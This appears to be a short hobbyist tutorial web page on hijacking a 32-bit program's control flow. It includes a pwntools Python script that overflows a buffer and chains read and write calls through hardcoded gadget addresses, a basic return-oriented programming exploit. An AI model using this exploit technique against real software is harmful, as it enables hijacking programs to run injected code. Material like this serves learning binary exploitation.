<html>
 <head>
<title> PWN a program  </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> PWN a program </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Hijacking a program to run your code !!!</h1>
   
 <br> 

<p> Ok This code is very powerful :) i.e It can convert a helloworld!!! program to shutdown ur computer  <br>
    Basically what  we do is we controll eip and the run a read sys call so that u we can place our malicious somewhere in the program <br>
     the we can also write something into our screen !! the below code takes input from us and write that into screen <br> </p>

<code> 

from pwn import *

read = 0x80517f0
write= 0x8051850
pop3ret=0x8048882


# empty payload
payload = ""

# padding
payload += "A"*44


# read something  from stdin
payload += pack(read)
payload +=pack(pop3ret)
payload += pack(0x0)           # fd = STDIN
payload += pack(0xfffdd000)    # buf
payload += pack(0x200)         # nbyte

#write to terminal

payload += pack(write)
payload += pack(0x8048b60)
payload += pack(0x1)           # fd = STDOUT
payload += pack(0xfffdd000)    # buf
payload += pack(0x200)         # nbyte

print payload 

 </code>

</body>
</html>